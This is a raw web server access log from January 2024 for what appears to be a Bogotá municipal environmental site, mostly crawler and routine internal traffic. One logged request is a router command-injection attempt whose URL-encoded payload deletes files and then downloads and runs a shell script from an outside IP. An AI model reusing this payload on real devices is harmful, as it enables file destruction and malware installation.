201.245.192.253 - - [14/Jan/2024:06:48:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202018/0716.pdf HTTP/1.1" 200 283875
216.244.66.195 - - [14/Jan/2024:06:49:04 -0500] "GET /BLA/resoluciones/AUTOS%202018/1564.pdf HTTP/1.1" 200 325147
216.244.66.195 - - [14/Jan/2024:06:49:27 -0500] "GET /BLA/resoluciones/AUTOS%202018/2714.pdf HTTP/1.1" 200 353716
201.245.192.253 - - [14/Jan/2024:06:49:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:49:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/3291.pdf HTTP/1.1" 200 275884
216.244.66.195 - - [14/Jan/2024:06:50:05 -0500] "GET /BLA/resoluciones/AUTOS%202018/4116.pdf HTTP/1.1" 200 241468
201.245.192.253 - - [14/Jan/2024:06:50:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:50:24 -0500] "GET /BLA/resoluciones/AUTOS%202019/0729.pdf HTTP/1.1" 200 538674
201.245.192.253 - - [14/Jan/2024:06:50:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:06:50:49 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:06:50:58 -0500] "GET /BLA/resoluciones/AUTOS%202019/3334.pdf HTTP/1.1" 200 305912
216.244.66.195 - - [14/Jan/2024:06:51:25 -0500] "GET /BLA/resoluciones/AUTOS%202020/0518.pdf HTTP/1.1" 200 538285
201.245.192.253 - - [14/Jan/2024:06:51:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:50:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:06:51:52 -0500] "GET /BLA/resoluciones/AUTOS%202020/1228.pdf HTTP/1.1" 200 699844
216.244.66.195 - - [14/Jan/2024:06:52:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/1461.pdf HTTP/1.1" 200 472581
201.245.192.253 - - [14/Jan/2024:06:52:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.236 - - [14/Jan/2024:06:52:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/2832.pdf HTTP/1.1" 200 391421
172.22.2.4 - - [14/Jan/2024:06:50:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
216.244.66.195 - - [14/Jan/2024:06:52:45 -0500] "GET /BLA/resoluciones/AUTOS%202020/1681.pdf HTTP/1.1" 200 340260
216.244.66.195 - - [14/Jan/2024:06:53:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/1698.pdf HTTP/1.1" 200 415925
201.245.192.253 - - [14/Jan/2024:06:53:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:53:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/2865.pdf HTTP/1.1" 200 345327
186.84.91.114 - - [14/Jan/2024:06:54:07 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html?fbclid=IwAR0DOy-EkJTthRRhnQH34ZOut9R25yDvICd8_ZirfV0gka2stFNlbyxQPDc HTTP/1.1" 200 894
216.244.66.195 - - [14/Jan/2024:06:54:20 -0500] "GET /BLA/resoluciones/AUTOS%202020/3315.pdf HTTP/1.1" 200 367657
201.245.192.253 - - [14/Jan/2024:06:54:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.232 - - [14/Jan/2024:06:54:57 -0500] "GET /secretaria-de-ambiente-presenta-cartilla-con-el-protocolo-para-el-manejo-y-control-de-la-langostilla-de-rio.html HTTP/1.1" 200 857
201.245.192.253 - - [14/Jan/2024:06:55:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:55:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:06:55:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:56:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.79.5 - - [14/Jan/2024:06:57:06 -0500] "GET /images/Caminatas%20(1)%20(2).jpeg HTTP/1.1" 200 81411
172.22.2.4 - - [14/Jan/2024:06:55:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:57:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [14/Jan/2024:06:58:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5867.pdf HTTP/1.1" 200 136492
201.245.192.253 - - [14/Jan/2024:06:58:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:56:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
201.245.192.253 - - [14/Jan/2024:06:59:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [14/Jan/2024:06:59:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4510.pdf HTTP/1.1" 200 667846
201.245.192.253 - - [14/Jan/2024:07:00:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:59:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:07:00:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:07:00:49 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [14/Jan/2024:07:01:21 -0500] "GET /BLA/resoluciones/Autos%202008/0368.pdf HTTP/1.1" 200 151967
69.171.231.7 - - [14/Jan/2024:07:01:38 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html HTTP/1.1" 200 894
173.252.95.116 - - [14/Jan/2024:07:01:41 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html HTTP/1.1" 200 894
201.245.192.253 - - [14/Jan/2024:07:01:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:07:02:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [14/Jan/2024:07:02:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9841.pdf HTTP/1.1" 200 789547
172.22.2.4 - - [14/Jan/2024:07:01:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:07:03:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:07:02:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
201.245.192.253 - - [14/Jan/2024:07:04:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.14 - - [14/Jan/2024:07:04:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0064.pdf HTTP/1.1" 200 226408
66.249.66.13 - - [14/Jan/2024:07:05:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4480.pdf HTTP/1.1" 200 783941
201.245.192.253 - - [14/Jan/2024:07:05:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:07:05:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:07:05:49 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:07:05:56 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [14/Jan/2024:07:06:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.14 - - [14/Jan/2024:07:06:39 -0500] "GET /Publicaciones/2022EE142158.pdf HTTP/1.1" 404 228
185.224.128.191 - - [14/Jan/2024:07:07:23 -0500] "GET /cgi-bin/luci/;stok=b3bafdbb03f0dfcf96bef095f6060d64/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Brm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh HTTP/1.1" 404 1018
201.245.192.253 - - [14/Jan/2024:07:07:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:07:08:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.75.66.97 - - [14/Jan/2024:07:08:35 -0500] "GET / HTTP/1.1" 200 319
66.249.66.14 - - [14/Jan/2024:07:08:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4653.pdf HTTP/1.1" 200 258591
172.22.2.4 - - [14/Jan/2024:07:07:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:07:09:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:07:08:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59813
201.245.192.253 - - [14/Jan/2024:07:10:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:07:10:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:07:10:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:07:11:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:07:12:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.156.49.69 - - [14/Jan/2024:07:12:30 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
191.156.49.69 - - [14/Jan/2024:07:12:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.156.49.69 - - [14/Jan/2024:07:12:36 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2011%2F HTTP/1.1" 200 637570
66.249.66.12 - - [14/Jan/2024:07:13:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9841.pdf HTTP/1.1" 200 789547
201.245.192.253 - - [14/Jan/2024:07:13:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:07:14:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
31.13.127.8 - - [14/Jan/2024:07:14:36 -0500] "GET /inicia-el-2024-conociendo-la-biodiversidad-de-bogoti.html?fbclid=IwAR0dgudpQewmscdOqZBXFefE-Z7FUqUcGvXKJDnIZdjrypVVkrPWVBt1WdI HTTP/1.1" 200 894
201.245.192.253 - - [14/Jan/2024:07:14:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38117
201.245.192.253 - - [14/Jan/2024:07:14:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39318
172.22.2.4 - - [14/Jan/2024:07:13:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:07:15:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
201.245.192.253 - - [14/Jan/2024:07:15:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:07:15:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Jan/2024:07:14:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
201.245.192.253 - - [14/Jan/2024:07:16:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [14/Jan/2024:07:16:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3227.pdf HTTP/1.1" 200 83849
201.245.192.253 - - [14/Jan/2024:07:17:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.75 - - [14/Jan/2024:07:17:59 -0500] "GET /portaldeninos/2021/06/01/agroecologia-tips-para-germinar-semillas-en-casa/ HTTP/1.1" 200 105801
66.249.79.76 - - [14/Jan/2024:07:18:04 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
173.252.79.116 - - [14/Jan/2024:07:18:14 -0500] "GET /images/Caminatas%20(1)%20(2).jpeg HTTP/1.1" 200 81411
181.59.2.239 - - [14/Jan/2024:07:18:18 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.59.2.239 - - [14/Jan/2024:07:18:19 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.59.2.239 - - [14/Jan/2024:07:18:19 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.59.2.239 - - [14/Jan/2024:07:18:19 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.59.2.239 - - [14/Jan/2024:07:18:19 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.59.2.239 - - [14/Jan/2024:07:18:19 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [14/Jan/2024:07:18:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.59.2.239 - - [14/Jan/2024:07:18:28 -0500] "POST /appsia/controlador HTTP/1.1" 200 3603
181.59.2.239 - - [14/Jan/2024:07:18:28 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
201.245.192.253 - - [14/Jan/2024:07:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38117
216.244.66.195 - - [14/Jan/2024:07:19:24 -0500] "GET /BLA/resoluciones/AUTOS%202011/3251.pdf HTTP/1.1" 200 479034
216.244.66.195 - - [14/Jan/2024:07:19:33 -0500] "GET /BLA/resoluciones/AUTOS%202012/0327.pdf HTTP/1.1" 200 308498
201.245.192.253 - - [14/Jan/2024:07:19:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39318
216.244.66.195 - - [14/Jan/2024:07:19:40 -0500] "GET /BLA/resoluciones/AUTOS%202012/0436.pdf HTTP/1.1" 200 176331
201.245.192.253 - - [14/Jan/2024:07:19:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:19:45 -0500] "GET /BLA/resoluciones/AUTOS%202012/0954.pdf HTTP/1.1" 200 1131157
207.46.13.130 - - [14/Jan/2024:07:20:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/03180.pdf HTTP/1.1" 200 464893
201.245.192.253 - - [14/Jan/2024:07:20:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:20:28 -0500] "GET /BLA/resoluciones/AUTOS%202012/1891.pdf HTTP/1.1" 200 1096586
201.245.192.253 - - [14/Jan/2024:07:20:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:07:20:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Jan/2024:07:19:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
107.170.237.75 - - [14/Jan/2024:07:20:59 -0500] "GET /actuator/health HTTP/1.1" 404 1018
216.244.66.195 - - [14/Jan/2024:07:21:17 -0500] "GET /BLA/resoluciones/AUTOS%202012/2111.pdf HTTP/1.1" 200 374903
66.249.66.13 - - [14/Jan/2024:07:21:23 -0500] "GET /BLA/resoluciones/AUTOS%202009/2551.pdf HTTP/1.1" 200 101256
201.245.192.253 - - [14/Jan/2024:07:21:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:21:48 -0500] "GET /BLA/resoluciones/AUTOS%202012/2121.pdf HTTP/1.1" 200 460035
172.22.2.4 - - [14/Jan/2024:07:20:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
216.244.66.195 - - [14/Jan/2024:07:22:18 -0500] "GET /BLA/resoluciones/AUTOS%202012/2608.pdf HTTP/1.1" 200 315916
201.245.192.253 - - [14/Jan/2024:07:22:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:07:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202012/2653.pdf HTTP/1.1" 200 270876
104.152.52.133 - - [14/Jan/2024:07:23:11 -0500] "GET / HTTP/1.0" 200 319
216.244.66.195 - - [14/Jan/2024:07:23:16 -0500] "GET /BLA/resoluciones/AUTOS%202012/2701.pdf HTTP/1.1" 200 379861
216.244.66.195 - - [14/Jan/2024:07:23:42 -0500] "GET /BLA/resoluciones/AUTOS%202012/2935.pdf HTTP/1.1" 200 369791
201.245.192.253 - - [14/Jan/2024:07:23:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.102.39.54 - - [14/Jan/2024:07:23:52 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18pA1RwKMS4zj4J42tQ1aAlHnS/ZBekj6za8nsqWuK8DOw3zKfICg55&y=U2FsdGVkX1+scoyEMJaRMHSZ6DSf88mT4hDQFKC+qFibaZnwx0X4ClJ7juVw5oMV HTTP/1.1" 200 30
186.102.39.54 - - [14/Jan/2024:07:23:53 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+FoydG4Hayo4uqul8KiKRbey1zm6Li4rOxwjHszyGDPQPRygynM4W4Db89DGaBVZJ8v+xfo27lGh/0Z9pQCOvSm6z7qYq1egw=&u=U2FsdGVkX18a2aiUucRUXElQuJHoGSDm8D8RjvWfTGo=&y=U2FsdGVkX1+scoyEMJaRMHSZ6DSf88mT4hDQFKC+qFibaZnwx0X4ClJ7juVw5oMV HTTP/1.1" 200 97
186.102.39.54 - - [14/Jan/2024:07:23:53 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Nb7qf6jrbhzyu9ZNvCVUX42ZrbYqi1G1evQlR8atGmkF/YX+nmoOf/Fj84gA0xEbNWInMP5G0VY4s+SNc0/GKKbyLv/5+kAPwq62EmgZYveXSijXcHDzKril7SnQKGHK9WqdvRDmaBg6SFRaeGlk2j+4kz2ZpQWb6XJcWDhRWgDc+qnO7JPQl7devcmRWbmWEZrv/mor2dVvdGIvCQZKW2hQ91vsNPvS1FcDfOY5mI4OBv0kkT0naAv6N7JY0FVH8uV4gsKKVul9utC0zUGB0EZMwRDhLVrAlocsctfmrKqW/VXeZ6JrWTUEfPaC/8l71wNLqvl5vspJlM5G9jCdl2cHS/bkTsETBEhbPmFpUiDsVJ9s9m208XjRqTOv8/9sAYG4eBHpKXYort20dpEplFdJS5XwNK522Bs8bB0+UJqf6OStp9osHlwKI8IfQ8QpiQA0MtrbaBBWvWEnqBit88vqlX6HGjE/6iAhMPHE1fraFPuaisfKHQLWMy2UaCPcUgYphlo+OR3RGyDAIOSzUkm5asPinawf9XiAE59RrQ1Mj9CAPcucsylkFY/ne6uF0jVyY1lALZEf9jYZ2Vj9AKjbqNNUq4fc0ii5SCFoayOfDprxKJhdOqQhf1K7AGu/4YqEEeQdYgwq6V68gOl0n+1lUfhHGOuxngsE5ZYPuh7CkczvXBNc6SeuXhQOdPWVfsqE4UW3BY1nO/gIWiSGVC6m+T/8/aWbKWl6uK0GEcRxjMGn3SNnAVzKsviyocIqLSG3HehCcGqgaaX+n734wgd7U805IP3CHPUzQVpE8CIJEZFBD7h7U+cEKpH24yHAXj8PkF+/KqIRSLCFzR850kpuIMq21jUuyTQOg9Bsm3a6HKf2UaWO+DNsfyoZdOF6l+Kt3j9s+Cswxh6g9KdozXt1fyoQcQQfFhCe6KIrtFeDRuUI7oiOAbj519bbIIANwNvPo0MwQwEGSHcOFe+OQgCareV2BRgfy61pL8aDXKhvPLslWgH/JWfnqUpWuO+ZXceuy8uEfEylr0Z6JKSnCYQc2gZQX0WOv75yM6szjULFHCOuOcvr05tIkbIch0VPlpbYsLSs5nRGRsqMs+HP4I18fGdBPQp9rj8ybOrugBv2OEz8J0oMvszb/hE6Vl4n+psnjwnpAkT0OzTcIV5e3orubFpBLOxeCFb0nO1E/qBTsi4MfpSH/e2EKIjNyGvmdmH4ZTCXaIaEMT9+ZGdnmY191SpeX+sIuGI9qJLKMF90ZpbmufhCC5H0u15XgrrXJU2ujdCC9cS+oWUM/dEJLO3VujzFvUlQBU5NUfpMHrvuvDzSMwLoPKejl0C/oAGe7UL7jN+ExpnONmtx6Uj7gO0ZT70qzyrwkGEMOvbc8BcjCL2yMe7wgyYsLm8HNteEKodO/9ARCunADdQyrqHtgka17hDjpvjms+ow1nFa7VOpgEbs+BHHj45PgOAogJOoacqZqV3JYKAedaiJ2V5Fdd2gBgC4zKC7lSzcX3d5J1zoaaaTCQl/Mw1uPYgO+Q6yejsRaLi7YPUFo9AGz0lg1xnsrtMy0E7c9nWvlUwxKfJKa/wQQ90/aiuEu4sYmcl0eys7JkfBgXA/QvCM420R0ph+3Zvcgh1ViT1f88uhrs7xKG437VnjVC5zOORFYhXKdjh0z6h5ea2yHGuwhbt3I0hBppQo03ruoPOg6UWmEDZ3rHIwXBczZaYsRAL5gSgWJqNm5f1pxhBm2qrWsb7mCu89cYg3kJPo=&u=U2FsdGVkX18a2aiUucRUXElQuJHoGSDm8D8RjvWfTGo=&y=U2FsdGVkX1+scoyEMJaRMHSZ6DSf88mT4hDQFKC+qFibaZnwx0X4ClJ7juVw5oMV HTTP/1.1" 200 2017
186.102.39.54 - - [14/Jan/2024:07:23:53 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19nFxo8JFXre1EFHJ7i1R4HA6Qw2MSWuhsH+LE9hfH1Ld960acAxGdxpT9hmpWGoHQ0Wrjd8xj4ykgk33lRbuSXKBavObQ/lp84um6pmhDqlJscuR/B6szpyYkBJGxePrkjLx5HYJxWfMKgdeAWT0P7VN5Lygepr+hi0Fdi5TLL197GzPvuAOFGG2VJHalOCBIAcTHCldj5wBZkcnFEc+6fL6hLQ9O8TjPm9trqANZhDfuKuHpLH7+N4CxTxXnFMhOAO29VZrOdwzWdshlm2zmlsRDNvXPbKJmwy5axujeuMnaV0S7+fo6+d2ESIfo+RC7FRGjPW7ZGgrDzbGQu3AbIM5TpaAyTFvY9t2GKGhSCRYFQv0H8TK5RVBnEklYFZzI5oe/xHN0qq5mH1SbltqFY1Z92f+hm9CPUhxBhu5Z95GmYRddQD9Ljfekrhp6xXdi/fSTM9ZtuZwB2GpekXVtHq8cfaDGUM6dP4KnHApiuOiqRCFJIUPZiOAhG0RgZoQj8yF0lgskczC+McMsxBCsmMRJd7jDMYx/skTifh6jgxddTGNr9qWb3sQBM6dooivh+NQWa9ReJ3nQQUAku7cThUPtu0kvgfZgfbvQOpuN1ztvMk80v/BZfXsbIhw+qkpEvGBZNvM5MJ9Xij/0bNA9K5adQBgsSnpo/2ZUrbKsFDQv0QYi0em3X5zuRbvFBmS63kO6W9SlITJ84NewGavPBVq4dFFhZ2bT/Vv/1kHb70q+4r/Op5Uh7&u=U2FsdGVkX18a2aiUucRUXElQuJHoGSDm8D8RjvWfTGo=&y=U2FsdGVkX1+scoyEMJaRMHSZ6DSf88mT4hDQFKC+qFibaZnwx0X4ClJ7juVw5oMV HTTP/1.1" 200 208
186.102.39.54 - - [14/Jan/2024:07:23:53 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18pA1RwKMS4zj4J42tQ1aAlHnS/ZBekj6za8nsqWuK8DOw3zKfICg55 HTTP/1.1" 200 31032
